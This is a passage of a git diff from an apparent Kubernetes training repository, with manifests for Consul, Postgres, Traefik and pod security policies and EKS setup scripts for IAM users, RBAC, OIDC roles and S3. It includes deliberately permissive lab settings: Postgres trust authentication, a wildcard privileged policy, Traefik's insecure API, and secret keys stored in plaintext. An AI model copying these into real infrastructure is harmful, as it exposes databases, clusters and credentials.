    - mountPath: /mnt/storage
      name: storage
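This pod assumes that a PVC named local-hostpath-pvc already exists (for instance, created from an OpenEBS local hostpath StorageClass). Once the pod is running, the writer loop can be observed with:

    kubectl exec openebs-local-hostpath-pod -- tail /mnt/storage/greet.txt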
k8s/persistent-consul.yaml (new file, 98 lines)
@@ -0,0 +1,98 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: persistentconsul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: persistentconsul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: persistentconsul
subjects:
- kind: ServiceAccount
  name: persistentconsul
  namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
  name: persistentconsul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: persistentconsul
spec:
  serviceName: persistentconsul
  replicas: 3
  selector:
    matchLabels:
      app: persistentconsul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: persistentconsul
    spec:
      serviceAccountName: persistentconsul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - persistentconsul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.6"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
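The -retry-join=provider=k8s flag makes each Consul agent discover its peers through the Kubernetes API, which is why the ClusterRole above grants get/list on pods. Once the three replicas are up, cluster membership can be checked with:

    kubectl exec persistentconsul-0 -c consul -- consul members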
k8s/portworx.yaml (1894 lines): diff suppressed because it is too large
@@ -12,10 +12,20 @@ spec:
      labels:
        app: postgres
    spec:
      schedulerName: stork
      #schedulerName: stork
      initContainers:
      - name: rmdir
        image: alpine
        volumeMounts:
        - mountPath: /vol
          name: postgres
        command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
      containers:
      - name: postgres
        image: postgres:10.5
        image: postgres:12
        env:
        - name: POSTGRES_HOST_AUTH_METHOD
          value: trust
        volumeMounts:
        - mountPath: /var/lib/postgresql/data
          name: postgres
k8s/psp-privileged.yaml (new file, 39 lines)
@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
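A PodSecurityPolicy only takes effect once something is allowed to use it: the psp:privileged ClusterRole above still has to be bound to users, groups, or ServiceAccounts. One possible binding (the subject here is an assumption, adjust to taste):

    kubectl create clusterrolebinding psp-privileged \
            --clusterrole=psp:privileged \
            --group=system:serviceaccounts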
k8s/psp-restricted.yaml (new file, 38 lines)
@@ -0,0 +1,38 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: runtime/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: runtime/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
@@ -1,28 +1,17 @@
apiVersion: extensions/v1beta1
apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "2"
  creationTimestamp: null
  generation: 1
  labels:
    app: socat
  name: socat
  namespace: kube-system
  selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
  replicas: 1
  selector:
    matchLabels:
      app: socat
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: socat
    spec:
@@ -34,34 +23,19 @@ spec:
        image: alpine
        imagePullPolicy: Always
        name: socat
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
  creationTimestamp: null
  labels:
    app: socat
  name: socat
  namespace: kube-system
  selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
  externalTrafficPolicy: Cluster
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: socat
  sessionAffinity: None
  type: NodePort
status:
  loadBalancer: {}
k8s/test.yaml (new file, 17 lines)
@@ -0,0 +1,17 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: whatever
spec:
  #tls:
  #- secretName: whatever.A.B.C.D.nip.io
  #  hosts:
  #  - whatever.A.B.C.D.nip.io
  rules:
  - host: whatever.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: whatever
          servicePort: 1234
k8s/traefik-v1.yaml (new file, 87 lines)
@@ -0,0 +1,87 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:1.7
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --api
|
||||
- --kubernetes
|
||||
- --logLevel=INFO
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
k8s/traefik-v2.yaml (new file, 102 lines)
@@ -0,0 +1,102 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:v2.5
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --accesslog
|
||||
- --api
|
||||
- --api.insecure
|
||||
- --log.level=INFO
|
||||
- --metrics.prometheus
|
||||
- --providers.kubernetesingress
|
||||
- --entrypoints.http.Address=:80
|
||||
- --entrypoints.https.Address=:443
|
||||
- --entrypoints.https.http.tls.certResolver=default
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- networking.k8s.io
|
||||
resources:
|
||||
- ingresses
|
||||
- ingressclasses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
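Since the DaemonSet runs with hostNetwork and binds ports 80 and 8080 on every node, a quick smoke test (the node address is a placeholder) might be:

    kubectl --namespace=kube-system get pods -l k8s-app=traefik-ingress-lb -o wide
    curl http://NODE_ADDRESS/    # expect a 404 from Traefik until an Ingress matches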
k8s/traefik.yaml (deleted, 100 lines)
@@ -1,100 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
  labels:
    k8s-app: traefik-ingress-lb
spec:
  template:
    metadata:
      labels:
        k8s-app: traefik-ingress-lb
        name: traefik-ingress-lb
    spec:
      tolerations:
      - effect: NoSchedule
        operator: Exists
      hostNetwork: true
      serviceAccountName: traefik-ingress-controller
      terminationGracePeriodSeconds: 60
      containers:
      - image: traefik
        name: traefik-ingress-lb
        ports:
        - name: http
          containerPort: 80
          hostPort: 80
        - name: admin
          containerPort: 8080
          hostPort: 8080
        securityContext:
          capabilities:
            drop:
            - ALL
            add:
            - NET_BIND_SERVICE
        args:
        - --api
        - --kubernetes
        - --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
  name: traefik-ingress-service
  namespace: kube-system
spec:
  selector:
    k8s-app: traefik-ingress-lb
  ports:
  - protocol: TCP
    port: 80
    name: web
  - protocol: TCP
    port: 8080
    name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: traefik-ingress-controller
rules:
- apiGroups:
  - ""
  resources:
  - services
  - endpoints
  - secrets
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - extensions
  resources:
  - ingresses
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: traefik-ingress-controller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
  name: traefik-ingress-controller
  namespace: kube-system
k8s/traefik.yaml (symbolic link)
@@ -0,0 +1 @@
traefik-v2.yaml
k8s/user=jean.doe.yaml (new file, 33 lines)
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: user=jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ user=jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: user=jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: user=jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
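These rules let the jean.doe ServiceAccount create CSRs, and manage only the CSR named user=jean.doe. This can be verified without acting as the account:

    kubectl auth can-i create certificatesigningrequests \
            --as=system:serviceaccount:users:jean.doe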
k8s/volumes-for-consul.yaml (new file, 64 lines)
@@ -0,0 +1,64 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
prepare-eks/10_create_cluster.sh (new executable file, 13 lines)
@@ -0,0 +1,13 @@
|
||||
#!/bin/sh
|
||||
# Create an EKS cluster.
|
||||
# This is not idempotent (each time you run it, it creates a new cluster).
|
||||
|
||||
eksctl create cluster \
|
||||
--node-type=t3.large \
|
||||
--nodes-max=10 \
|
||||
--alb-ingress-access \
|
||||
--asg-access \
|
||||
--ssh-access \
|
||||
--with-oidc \
|
||||
#
|
||||
|
||||
prepare-eks/20_create_users.sh (new executable file, 32 lines)
@@ -0,0 +1,32 @@
|
||||
#!/bin/sh
|
||||
# For each user listed in "users.txt", create an IAM user.
|
||||
# Also create AWS API access keys, and store them in "users.keys".
|
||||
# This is idempotent (you can run it multiple times, it will only
|
||||
# create the missing users). However, it will not remove users.
|
||||
# Note that you can remove users from "users.keys" (or even wipe
|
||||
# that file out entirely) and then this script will delete their
|
||||
# keys and generate new keys for them (and add the new keys to
|
||||
# "users.keys".)
|
||||
|
||||
echo "Getting list of existing users ..."
|
||||
aws iam list-users --output json | jq -r .Users[].UserName > users.tmp
|
||||
|
||||
for U in $(cat users.txt); do
|
||||
if ! grep -qw $U users.tmp; then
|
||||
echo "Creating user $U..."
|
||||
aws iam create-user --user-name=$U \
|
||||
--tags=Key=container.training,Value=1
|
||||
fi
|
||||
if ! grep -qw $U users.keys; then
|
||||
echo "Listing keys for user $U..."
|
||||
KEYS=$(aws iam list-access-keys --user=$U | jq -r .AccessKeyMetadata[].AccessKeyId)
|
||||
for KEY in $KEYS; do
|
||||
echo "Deleting key $KEY for user $U..."
|
||||
aws iam delete-access-key --user=$U --access-key-id=$KEY
|
||||
done
|
||||
echo "Creating access key for user $U..."
|
||||
aws iam create-access-key --user=$U --output json \
|
||||
| jq -r '.AccessKey | [ .UserName, .AccessKeyId, .SecretAccessKey ] | @tsv' \
|
||||
>> users.keys
|
||||
fi
|
||||
done
|
||||
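Given the @tsv filter above, users.keys ends up with one tab-separated line per user: user name, access key ID, secret access key. A single user's credentials can then be pulled out with, for example:

    awk -F'\t' '$1 == "ada.lovelace" { print $2, $3 }' users.keys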
prepare-eks/30_create_or_update_policy.sh (new executable file, 51 lines)
@@ -0,0 +1,51 @@
|
||||
#!/bin/sh
|
||||
# Create an IAM policy to authorize users to do "aws eks update-kubeconfig".
|
||||
# This is idempotent, which allows to update the policy document below if
|
||||
# you want the users to do other things as well.
|
||||
# Note that each time you run this script, it will actually create a new
|
||||
# version of the policy, set that version as the default version, and
|
||||
# remove all non-default versions. (Because you can only have up to
|
||||
# 5 versions of a given policy, so you need to clean them up.)
|
||||
# After running that script, you will want to attach the policy to our
|
||||
# users (check the other scripts in that directory).
|
||||
|
||||
POLICY_NAME=user.container.training
|
||||
POLICY_DOC='{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Action": [
|
||||
"eks:DescribeCluster"
|
||||
],
|
||||
"Resource": "arn:aws:eks:*",
|
||||
"Effect": "Allow"
|
||||
}
|
||||
]
|
||||
}'
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
|
||||
aws iam create-policy-version \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
|
||||
--policy-document "$POLICY_DOC" \
|
||||
--set-as-default
|
||||
|
||||
# For reference, the command below creates a policy without versioning:
|
||||
#aws iam create-policy \
|
||||
#--policy-name user.container.training \
|
||||
#--policy-document "$JSON"
|
||||
|
||||
for VERSION in $(
|
||||
aws iam list-policy-versions \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
|
||||
--query 'Versions[?!IsDefaultVersion].VersionId' \
|
||||
--output text)
|
||||
do
|
||||
aws iam delete-policy-version \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
|
||||
--version-id "$VERSION"
|
||||
done
|
||||
|
||||
# For reference, the command below shows all users using the policy:
|
||||
#aws iam list-entities-for-policy \
|
||||
#--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
|
||||
prepare-eks/40_attach_policy.sh (new executable file, 14 lines)
@@ -0,0 +1,14 @@
|
||||
#!/bin/sh
|
||||
# Attach our user policy to all the users defined in "users.txt".
|
||||
# This should be idempotent, because attaching the same policy
|
||||
# to the same user multiple times doesn't do anything.
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
POLICY_NAME=user.container.training
|
||||
|
||||
for U in $(cat users.txt); do
|
||||
echo "Attaching policy to user $U ..."
|
||||
aws iam attach-user-policy \
|
||||
--user-name $U \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
|
||||
done
|
||||
prepare-eks/50_aws_auth.sh (new executable file, 24 lines)
@@ -0,0 +1,24 @@
|
||||
#!/bin/sh
|
||||
# Update the aws-auth ConfigMap to map our IAM users to Kubernetes users.
|
||||
# Each user defined in "users.txt" will be mapped to a Kubernetes user
|
||||
# with the same name, and put in the "container.training" group, too.
|
||||
# This is idempotent.
|
||||
# WARNING: this will wipe out the mapUsers component of the aws-auth
|
||||
# ConfigMap, removing all users that aren't in "users.txt".
|
||||
# It won't touch mapRoles, so it shouldn't break the role mappings
|
||||
# put in place by EKS.
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
|
||||
rm -f users.map
|
||||
for U in $(cat users.txt); do
|
||||
echo "\
|
||||
- userarn: arn:aws:iam::$ACCOUNT:user/$U
|
||||
username: $U
|
||||
groups: [ container.training ]\
|
||||
" >> users.map
|
||||
done
|
||||
|
||||
kubectl create --namespace=kube-system configmap aws-auth \
|
||||
--dry-run=client --from-file=mapUsers=users.map -o yaml \
|
||||
| kubectl apply -f-
|
||||
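The create --dry-run | apply pipeline is what makes the update idempotent. The resulting mapping can be inspected with:

    kubectl --namespace=kube-system get configmap aws-auth -o yaml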
prepare-eks/60_setup_rbac_and_ns.sh (new executable file, 65 lines)
@@ -0,0 +1,65 @@
|
||||
#!/bin/sh
|
||||
# Create a shared Kubernetes Namespace ("container-training") as well as
|
||||
# individual namespaces for every user in "users.txt", and set up a bunch
|
||||
# of permissions.
|
||||
# Specifically:
|
||||
# - each user gets "view" permissions in the "default" Namespace
|
||||
# - each user gets "edit" permissions in the "container-training" Namespace
|
||||
# - each user gets permissions to list Nodes and Namespaces
|
||||
# - each user gets "admin" permissions in their personal Namespace
|
||||
# Note that since Kubernetes Namespaces can't have dots in their names,
|
||||
# if a user has dots, dots will be mapped to dashes.
|
||||
# So user "ada.lovelace" will get namespace "ada-lovelace".
|
||||
# This is kind of idempotent (but will raise a bunch of errors for objects
|
||||
# that already exist).
|
||||
# TODO: if this needs to evolve, replace all the "create" operations by
|
||||
# "apply" operations. But this is good enough for now.
|
||||
|
||||
kubectl create rolebinding --namespace default container.training \
|
||||
--group=container.training --clusterrole=view
|
||||
|
||||
kubectl create clusterrole view-nodes \
|
||||
--verb=get,list,watch --resource=node
|
||||
kubectl create clusterrolebinding view-nodes \
|
||||
--group=container.training --clusterrole=view-nodes
|
||||
|
||||
kubectl create clusterrole view-namespaces \
|
||||
--verb=get,list,watch --resource=namespace
|
||||
kubectl create clusterrolebinding view-namespaces \
|
||||
--group=container.training --clusterrole=view-namespaces
|
||||
|
||||
kubectl create namespace container-training
|
||||
kubectl create rolebinding --namespace container-training edit \
|
||||
--group=container.training --clusterrole=edit
|
||||
|
||||
# Note: API calls to EKS tend to be fairly slow. To optimize things a bit,
|
||||
# instead of running "kubectl" N times, we generate a bunch of YAML and
|
||||
# apply it. It will still generate a lot of API calls but it's much faster
|
||||
# than calling "kubectl" N times. It might be possible to make this even
|
||||
# faster by generating a "kind: List" (I don't know if this would issue
|
||||
# a single API calls or multiple ones; TBD!)
|
||||
for U in $(cat users.txt); do
|
||||
NS=$(echo $U | tr . -)
|
||||
cat <<EOF
|
||||
---
|
||||
kind: Namespace
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: $NS
|
||||
---
|
||||
kind: RoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: admin
|
||||
namespace: $NS
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: admin
|
||||
subjects:
|
||||
- apiGroup: rbac.authorization.k8s.io
|
||||
kind: User
|
||||
name: $U
|
||||
EOF
|
||||
done | kubectl create -f-
|
||||
|
||||
prepare-eks/70_oidc.sh (new executable file, 76 lines)
@@ -0,0 +1,76 @@
|
||||
#!/bin/sh
|
||||
# Create an IAM role to be used by a Kubernetes ServiceAccount.
|
||||
# The role isn't given any permissions yet (this has to be done by
|
||||
# another script in this series), but a properly configured Pod
|
||||
# should still be able to execute "aws sts get-caller-identity"
|
||||
# and confirm that it's using that role.
|
||||
# This requires the cluster to have an attached OIDC provider.
|
||||
# This should be the case if the cluster has been created with
|
||||
# the scripts in this directory; otherwise, this can be done with
|
||||
# the subsequent command, which is idempotent:
|
||||
# eksctl utils associate-iam-oidc-provider --cluster cluster-name-12341234 --approve
|
||||
# The policy document used below will authorize all ServiceAccounts
|
||||
# in the "container-training" Namespace to use that role.
|
||||
# This script will also annotate the container-training:default
|
||||
# ServiceAccount so that it can use that role.
|
||||
# This script is not quite idempotent: if you want to use a new
|
||||
# trust policy, some work will be required. (You can delete the role,
|
||||
# but that requires detaching the associated policies. There might also
|
||||
# be a way to update the trust policy directly; we didn't investigate this
|
||||
# further at this point.)
|
||||
|
||||
if [ "$1" ]; then
|
||||
CLUSTER="$1"
|
||||
else
|
||||
echo "Please indicate cluster to use. Available clusters:"
|
||||
aws eks list-clusters --output table
|
||||
exit 1
|
||||
fi
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
OIDC=$(aws eks describe-cluster --name $CLUSTER --query cluster.identity.oidc.issuer --output text | cut -d/ -f3-)
|
||||
ROLE_NAME=s3-reader-container-training
|
||||
TRUST_POLICY=$(envsubst <<EOF
|
||||
{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Effect": "Allow",
|
||||
"Principal": {
|
||||
"Federated": "arn:aws:iam::${ACCOUNT}:oidc-provider/${OIDC}"
|
||||
},
|
||||
"Action": "sts:AssumeRoleWithWebIdentity",
|
||||
"Condition": {
|
||||
"StringLike": {
|
||||
"${OIDC}:sub": ["system:serviceaccount:container-training:*"]
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
EOF
|
||||
)
|
||||
|
||||
aws iam create-role \
|
||||
--role-name "$ROLE_NAME" \
|
||||
--assume-role-policy-document "$TRUST_POLICY"
|
||||
|
||||
kubectl annotate serviceaccounts \
|
||||
--namespace container-training default \
|
||||
"eks.amazonaws.com/role-arn=arn:aws:iam::$ACCOUNT:role/$ROLE_NAME" \
|
||||
--overwrite
|
||||
|
||||
exit
|
||||
|
||||
# Here are commands to delete the role:
|
||||
for POLICY_ARN in $(aws iam list-attached-role-policies --role-name $ROLE_NAME --query 'AttachedPolicies[*].PolicyArn' --output text); do aws iam detach-role-policy --role-name $ROLE_NAME --policy-arn $POLICY_ARN; done
|
||||
aws iam delete-role --role-name $ROLE_NAME
|
||||
|
||||
# Merging the policy with the existing policies:
|
||||
{
|
||||
aws iam get-role --role-name s3-reader-container-training | jq -r .Role.AssumeRolePolicyDocument.Statement[]
|
||||
echo "$TRUST_POLICY" | jq -r .Statement[]
|
||||
} | jq -s '{"Version": "2012-10-17", "Statement": .}' > /tmp/policy.json
|
||||
aws iam update-assume-role-policy \
|
||||
--role-name $ROLE_NAME \
|
||||
--policy-document file:///tmp/policy.json
|
||||
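To confirm that the annotation works, one option is a throwaway pod with the AWS CLI in the container-training Namespace, checking which identity it receives (a sketch; the amazon/aws-cli image's entrypoint is the aws command, and the pod uses the annotated default ServiceAccount):

    kubectl run awstest --rm -it --restart=Never \
            --namespace=container-training \
            --image=amazon/aws-cli -- sts get-caller-identity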
prepare-eks/80_s3_bucket.sh (new executable file, 54 lines)
@@ -0,0 +1,54 @@
|
||||
#!/bin/sh
|
||||
# Create an S3 bucket with two objects in it:
|
||||
# - public.txt (world-readable)
|
||||
# - private.txt (private)
|
||||
# Also create an IAM policy granting read-only access to the bucket
|
||||
# (and therefore, to the private object).
|
||||
# Finally, attach the policy to an IAM role (for instance, the role
|
||||
# created by another script in this directory).
|
||||
# This isn't idempotent, but it can be made idempotent by replacing the
|
||||
# "aws iam create-policy" call with "aws iam create-policy-version" and
|
||||
# a bit of extra elbow grease. (See other scripts in this directory for
|
||||
# an example).
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
BUCKET=container.training
|
||||
ROLE_NAME=s3-reader-container-training
|
||||
POLICY_NAME=s3-reader-container-training
|
||||
POLICY_DOC=$(envsubst <<EOF
|
||||
{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Effect": "Allow",
|
||||
"Action": [
|
||||
